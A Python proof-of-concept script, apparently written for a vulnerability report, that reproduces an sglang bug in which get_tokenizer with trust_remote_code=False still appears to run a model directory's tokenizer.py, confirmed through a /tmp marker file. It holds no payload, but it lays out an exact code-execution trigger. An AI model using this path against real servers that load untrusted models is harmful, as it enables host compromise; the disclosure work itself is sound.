# README.md
# Rendering markdown...
"""Reproduce the bug via the call site sglang.launch_server uses
(TokenizerManager.__init__ -> get_tokenizer)."""
import importlib
import importlib.machinery
import os
import sys
import types
# Marker file: main() deletes any stale copy before the call and treats its
# existence afterwards as evidence that the model's tokenizer.py was executed.
PROOF_FILE = "/tmp/sglang_poc_proof.txt"
# Model directory handed to get_tokenizer(); main() exits with status 2 if it
# is missing and tells the user to run setup_model.py first.
MODEL_DIR = "/poc/malicious_model"
def stub_gpu_modules():
    """Install empty stand-in modules in ``sys.modules`` for a fixed set of names.

    Every listed name that is not already present in ``sys.modules`` gets a
    fresh ``types.ModuleType`` carrying a loader-less ``ModuleSpec`` and
    ``__version__ = "0.0.0"``. Names that are already registered are left
    untouched.

    NOTE(review): presumably this lets the sglang import in ``main`` succeed on
    a host that lacks these optional/GPU packages -- confirm against the
    target environment.
    """
    placeholder_names = (
        "cuda_python",
        "flashinfer",
        "flashinfer_python",
        "sglang_kernel",
        "quack_kernels",
        "xgrammar",
        "torch_memory_saver",
        "flash_attn_4",
        "flash_attn",
        "vllm",
        "nvidia",
        "nvidia.cutlass",
        "nvidia_cutlass_dsl",
        "sglang.srt.layers",
        "openai_harmony",
        "torchcodec",
        "smg_grpc_servicer",
        "apache_tvm_ffi",
        "llguidance",
    )
    for name in placeholder_names:
        # Never shadow a module that is really importable/already imported.
        if name in sys.modules:
            continue
        placeholder = types.ModuleType(name)
        # A spec and a version string are set so the stub carries the
        # attributes a normally-imported module would expose.
        placeholder.__spec__ = importlib.machinery.ModuleSpec(name, None)
        placeholder.__version__ = "0.0.0"
        sys.modules[name] = placeholder
def main():
    """Call ``get_tokenizer`` on ``MODEL_DIR`` and report whether ``PROOF_FILE`` appeared.

    Steps:
      1. Register the stub modules, then require ``MODEL_DIR`` to exist
         (exit status 2 otherwise).
      2. Remove any ``PROOF_FILE`` left over from an earlier run.
      3. Call ``get_tokenizer`` with ``tokenizer_mode="auto"`` and
         ``trust_remote_code=False``; any ``Exception`` is reported rather
         than propagated.
      4. Print the outcome and the contents of ``PROOF_FILE`` if it exists.

    Exits with status 0 when ``PROOF_FILE`` exists after the call, and with
    status 1 when it does not.
    """
    stub_gpu_modules()

    if not os.path.isdir(MODEL_DIR):
        print("[ERROR] Run setup_model.py first")
        sys.exit(2)

    # Start from a clean slate so a stale marker cannot produce a false positive.
    if os.path.exists(PROOF_FILE):
        os.remove(PROOF_FILE)

    # Imported only after the stubs are registered.
    from sglang.srt.utils.hf_transformers_utils import get_tokenizer

    # Same arguments that tokenizer_manager.py:320 passes to get_tokenizer;
    # the ServerArgs default for trust_remote_code is False.
    print(f"[*] get_tokenizer({MODEL_DIR!r}, tokenizer_mode='auto', trust_remote_code=False)")
    try:
        loaded = get_tokenizer(MODEL_DIR, tokenizer_mode="auto", trust_remote_code=False)
        outcome = type(loaded).__name__
    except Exception as err:
        # A failure of the call is recorded, not fatal: the marker file is
        # still checked below.
        outcome = f"EXCEPTION:{type(err).__name__}"
        print(f"[*] Exception: {err}")

    proof_written = os.path.exists(PROOF_FILE)
    print(f"[*] returned: {outcome}")
    print(f"[*] tokenizer.py executed: {proof_written}")

    if not proof_written:
        print("\nNot triggered.")
        sys.exit(1)

    print("\nCONFIRMED via TokenizerManager path.")
    with open(PROOF_FILE) as proof:
        for entry in proof:
            print(f" {entry.rstrip()}")
    sys.exit(0)
# Run the reproduction only when executed as a script, not when imported.
if __name__ == "__main__":
    main()